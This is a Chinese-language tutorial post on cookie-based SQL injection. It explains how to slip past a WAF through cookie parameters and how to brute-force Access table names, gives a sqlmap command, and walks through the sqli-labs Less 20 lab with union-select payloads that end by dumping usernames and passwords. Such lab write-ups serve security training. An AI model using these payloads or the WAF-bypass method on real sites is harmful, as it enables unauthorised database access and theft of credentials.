码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Access注入 - Cookie注入


    文章目录

    • Cookie注入简介
      • Cookie与注入有什么关系
      • 如何设置Cookie
      • access数据库与MySQL数据库的区别
    • 靶场 sqli-labs less 20
      • 判断是否存在注入
      • 判断字段数
      • 判断显错位
      • 判断数据库名
      • 判断表名
      • 判断字段名
      • 获取具体数据

    Cookie注入简介

    Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登录管理员账号

    Cookie与注入有什么关系

    在动态脚本语言中存在超全局变量可以获取多种传参方式(基本上)

    很多时候开发在开发的时候为了考虑到多种接受传参,在接受传参的时候都是用多种解释传参的方式

    例如:

    php中的 $_request[]可以获取POST|GET|COOKIE传参
    
    注意:PHP5.4以上版本就不会接受Cookie传参了
    
    如果说开发用了$_request[]来解释参数,然后我们的POST和GET传参被WAF拦截了,那么也许WAF没有对Cookie进行检测,我们尝试用Cookie进行传参,有可能会达到绕过的目的。
    
    • 1
    • 2
    • 3
    • 4
    • 5

    如何设置Cookie

    用Javascript设置,打开F12开发者工具,选择Console,输入Js的语句就可以了

    document.cookie="id="+escape("1")
    通过浏览器Document.Cookie来设置Cookie
    Cookie名字为id  escape是一个编码函数,这个函数会进行一次url编码
    
    • 1
    • 2
    • 3

    access数据库与MySQL数据库的区别

    access数据库没有系统自带表,而且access数据库只有一个数据库,不用纠结库名,那怎么获取access数据库的表名和字段名呢,只有一个方法就是爆破

    access数据库在进行显错位判断的时候,必须写完整的SQL语句

    账号密码一般在盛行access数据库的年代,都在admin表的username和password字段中

    注意点:COOKIE注入的时候一定要把GET类型的传参删除,不然优先执行GET类型传参

    union select 1,2,3,4,5,6,7,8,9,10 from admin
    
    • 1
    问:如果不知道库名怎么办?
    答:就一个库,没必要知道
    
    问:如果不知道表名怎么办?
    答:只能靠爆破,and exists(select * from xxx) 如果页面正常就是存在这个XXX表 exists这个函数就是检查子查询能否查询到数据,如果能会返回一个True
    
    问:sqlmap如何跑Cookie注入
    答:sqlmap.py -u 'http://xx.xx.xx.xx:8080/xxx.asp' --cookie "id=123" --level 2
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8

    靶场 sqli-labs less 20

    这一关的注入方式是cookie注入,所有语句与之前一样

    判断是否存在注入

    测试以下语句,发现存在单引号闭合,存在cookie注入漏洞

    admin and 1=1
    admin and 1=2 
    admin or 1=1 
    admin' and 1=1 --+
    
    • 1
    • 2
    • 3
    • 4

    判断字段数

    发现字段数为3

    admin ' order by 3 --+
    
    • 1

    判断显错位

    -1' union select 1,2,3 --+
    
    • 1

    判断数据库名

    -1' union select 1,2,database() --+
    
    • 1

    判断表名

    -1' union select 1,2,table_name from information_schema.tables where table_schema='security' limit 3,1 --+
    
    • 1

    判断字段名

    -1' union select 1,2,column_name from information_schema.columns where table_schema='security' and table_name='users' --+
    
    • 1

    获取具体数据

    -1' union select 1,2,id,username,password from users --+
    
    • 1

  • 相关阅读:
    入职后快速配置mac方便快速上手业务for研测向
    传感模块:MATEKSYS Optical Flow & LIDAR 3901-L0X
    基于JAVA水果销售管理网站计算机毕业设计源码+系统+mysql数据库+lw文档+部署
    连续时间系统的时域分析
    web前端期末大作业——仿小米商城电商平台(6页) html+css+javascript网页设计实例 企业网站制作
    java redis 连接池
    放弃5k事业编选择了15k的程序员,真的值得么?
    sort 函数排序之cmp浅析
    【每日一题】第二天
    谈谈制定数据治理战略路线图的方法
  • 原文地址:https://blog.csdn.net/weixin_44971640/article/details/133087318
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号